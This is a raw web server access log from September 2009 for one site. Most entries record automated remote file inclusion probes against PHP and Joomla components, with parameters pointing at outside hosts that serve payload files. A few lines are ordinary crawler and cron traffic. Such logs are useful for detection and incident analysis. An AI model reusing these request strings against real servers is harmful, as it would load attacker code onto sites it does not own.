67.205.103.171 - - [16/Sep/2009:10:03:36 -0700] "GET /logs/access_090901.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:03:44 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:03:44 -0700] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:03:50 -0700] "GET /logs/access_071228.log%20%20//skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:03:51 -0700] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:21 -0700] "GET /logs/access_090325.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:22 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:22 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:22 -0700] "GET /logs/access_090805.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:23 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:23 -0700] "GET /logs/access_090325.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:04:30 -0700] "GET /logs/access_080623.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:33 -0700] "GET /logs/access_090805.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:04:33 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:10:05:01 -0700] "GET /logs/access_090903.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.125.100 - - [16/Sep/2009:10:05:29 -0700] "GET /logs/access_090903.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:06:08 -0700] "GET /logs/access_080313.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:06:28 -0700] "GET /logs/access_080821.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:06:28 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:06:28 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:10:06:44 -0700] "GET /logs/access_090516.log/index.php?body=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:10:06:46 -0700] "GET /logs/index.php?body=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:10:06:46 -0700] "GET /logs/access_090516.log/index.php?body=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:10:06:47 -0700] "GET /logs/index.php?body=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:10:06:50 -0700] "GET /index.php?body=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 200 19792 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [16/Sep/2009:10:06:50 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
222.236.47.188 - - [16/Sep/2009:10:06:51 -0700] "GET /index.php?body=http://www.yihwa.com/bbs//skin/dognara_gallery/id1.txt?? HTTP/1.1" 200 19792 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:07:00 -0700] "GET /logs/access_080313.log//newspublish/include.php?path[docroot]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:07:03 -0700] "GET /logs/access_081107.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:07:35 -0700] "GET /logs/access_080105.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:08:26 -0700] "GET /logs/access_080809.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:08:34 -0700] "GET /logs/access_080604.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:45 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:45 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:45 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:45 -0700] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:45 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:45 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:46 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:08:48 -0700] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:08:51 -0700] "GET /logs/access_080109.log//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:08:56 -0700] "GET /logs/access_080218.log%20%20//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:08:57 -0700] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:09:02 -0700] "GET /logs/access_080218.log%20%20//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:09:02 -0700] "GET /logs/access.log HTTP/1.0" 200 158523 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.24.49.35 - - [16/Sep/2009:10:09:10 -0700] "GET /logs/access_080313.log//newspublish/include.php?path[docroot]=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:09:14 -0700] "GET /logs/access_080416.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:09:19 -0700] "GET /logs/access_080228.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.218.69 - - [16/Sep/2009:10:09:33 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 1751 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
145.253.245.211 - - [16/Sep/2009:10:10:21 -0700] "GET /logs/access_080701.log%20//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:10:25 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:10:25 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:10:25 -0700] "GET /logs/access_080530.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:10:42 -0700] "GET /logs/access_080319.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:10:42 -0700] "GET /logs/access_090302.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:10:44 -0700] "GET /logs/access_080406.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:10:46 -0700] "GET /logs/access_080512.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:11:21 -0700] "GET /logs//bbs//skin/ggambo5100_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:11:21 -0700] "GET /bbs//skin/ggambo5100_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:11:21 -0700] "GET /logs/access_090826.log%20%20//bbs//skin/ggambo5100_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:11:22 -0700] "GET /bbs//skin/ggambo5100_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:11:22 -0700] "GET /logs//bbs//skin/ggambo5100_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:11:22 -0700] "GET /logs/access_090826.log//bbs//skin/ggambo5100_board/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:12:26 -0700] "GET /logs/access_080313.log/main.php?pagina=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:13:13 -0700] "GET /logs/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:13:13 -0700] "GET /modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:13:13 -0700] "GET /logs/access_080906.log/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:13:15 -0700] "GET /logs//index2.php?page=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:13:18 -0700] "GET /logs/access_081214.log HTTP/1.0" 200 3304295 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:13:20 -0700] "GET /logs/access_070907.log HTTP/1.0" 200 61100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:13:24 -0700] "GET /logs/access_080606.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:13:42 -0700] "GET /logs/access_070731.log HTTP/1.0" 200 34839 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:13:43 -0700] "GET /logs//index.php?pag=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:13:45 -0700] "GET /logs/access_090712.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:10:14:02 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:14:12 -0700] "GET /logs/access_080708.log//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:14:19 -0700] "GET /logs/access_080906.log%20%20/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:14:21 -0700] "GET /logs//index2.php?pag=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:14:23 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:14:23 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:14:23 -0700] "GET /logs/access_090903.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:14:44 -0700] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:14:47 -0700] "GET /logs/access_080109.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:14:48 -0700] "GET /logs/access_080109.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:14:48 -0700] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:14:55 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:14:55 -0700] "GET /logs/access_090903.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:14:55 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:15:23 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:15:23 -0700] "GET /logs/access_090903.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:10:15:23 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:15:59 -0700] "GET /bikes/occcb/eBayISAPI.dll_files/ HTTP/1.0" 200 2918 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:16:38 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:16:38 -0700] "GET /include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:16:41 -0700] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:16:54 -0700] "GET //skin/ggambo7002_board/basic.php?dir=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:16:55 -0700] "GET /logs///skin/ggambo7002_board/basic.php?dir=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:16:55 -0700] "GET /logs/access_090804.log%20%20///skin/ggambo7002_board/basic.php?dir=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:29 -0700] "GET /logs/////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 117472 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:29 -0700] "GET /logs/access_080201.log/////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:30 -0700] "GET /logs/////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 117472 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:30 -0700] "GET /logs/access_080201.log%20%20/////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:31 -0700] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 19954 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:31 -0700] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 200 19954 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:18:54 -0700] "GET /logs/access_080205.log/////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.239.69.157 - - [16/Sep/2009:10:19:05 -0700] "GET /logs/access_080205.log%20%20/////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.csjh.tpc.edu.tw/~afu//blog2/.../.../chokeng_blitars/.../revye/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:19:34 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:19:34 -0700] "GET /logs/access_081013.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:19:34 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:19:46 -0700] "GET /logs/access_080518.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:20:05 -0700] "GET /stats/modules/My_eGallery/index.php?basepath=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:20:05 -0700] "GET /logs/access_080531.log//stats/modules/My_eGallery/index.php?basepath=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:20:05 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:10:20:13 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
